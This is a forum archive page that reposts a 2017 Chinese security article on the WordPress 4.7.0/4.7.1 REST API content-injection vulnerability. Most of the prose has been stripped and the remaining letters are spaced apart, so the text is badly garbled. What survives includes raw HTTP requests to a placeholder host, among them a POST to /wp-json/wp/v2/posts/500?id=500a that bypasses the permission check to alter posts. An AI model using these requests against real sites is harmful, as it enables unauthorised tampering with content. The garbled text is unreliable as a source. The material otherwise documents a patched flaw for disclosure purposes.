搜索

[10983] 2017-02-03_WordPress又曝漏洞:RESTAPI由于权限控制失效致内容注入

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-18
2017-02-03_WordPress又曝漏洞:RESTAPI由于权限控制失效致内容注入 W o r d P r e s s R E S T   A P I   F r e e B u f   2 0 1 7 - 0 2 - 0 3 W o r d P r e s s R E S T   A P I S u c u r i R E S T   A P I W o r d P r e s s   4 . 7 . 0         W o r d P r e s s 使 广 使   W o r d P r e s s   R E S T   A P I   便   J S O N   访   W o r d P r e s s   A P I     A P I   W o r d P r e s s   R E S T   A P I     4 . 7 0     W o r d P r e s s   W o r d P r e s s S u c u r i 4 . 7 . 2 W o r d P r e s s   R E S T   A P I   / 4 . 7 . 0     4 . 7 . 1 W o r d P r e s s     4 . 7 . 0     R E S T   A P I   P e r m a l i n k s P l a i n 使   W o r d P r e s s   < l i n k   r e l = " h t t p s : / / a p i . w . o r g / "   h r e f = " h t t p : / / w w w . x x x . c o m / w p - j s o n / " >
A P I   h t t p : / / w w w . x x x . c o m / w p - j s o n / i d   4 0 1     A P I   使 h t t p : / / v 2 . w p - a p i . o r g / P o C   2 0 0     4 . 7 . 2 h t t p s : / / b l o g . s u c u r i . n e t / 2 0 1 7 / 0 2 / c o n t e n t - i n j e c t i o n - v u l n e r a b i l i t y - w o r d p r e s s - r e s t - a p i . h t m l h t t p : / / v 2 . w p - a p i . o r g / *   F r e e B u f . C O M G E T   / i n d e x . p h p / w p - j s o n / w p / v 2 / p o s t s   H T T P / 1 . 1 H o s t :   x x x . n e t U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 2 _ 2 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 5 . 0 . 2 8 8 3 . 9 5   S a f a r i / 5 3 7 . 3 6 G E T   / i n d e x . p h p / w p - j s o n / w p / v 2 / p o s t s / 5 0 0   H T T P / 1 . 1 H o s t :   x x x . n e t U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 2 _ 2 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 5 . 0 . 2 8 8 3 . 9 5   S a f a r i / 5 3 7 . 3 6 P O S T   / i n d e x . p h p / w p - j s o n / w p / v 2 / p o s t s / 5 0 0 ? i d = 5 0 0   H T T P / 1 . 1 H o s t :   x x x . n e t U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 2 _ 2 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 5 . 0 . 2 8 8 3 . 9 5   S a f a r i / 5 3 7 . 3 6 P O S T   / i n d e x . p h p / w p - j s o n / w p / v 2 / p o s t s / 5 0 0 ? i d = 5 0 0 a   H T T P / 1 . 1 H o s t :   x x x . n e t U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 2 _ 2 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 5 5 . 0 . 2 8 8 3 . 9 5   S a f a r i / 5 3 7 . 3 6

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理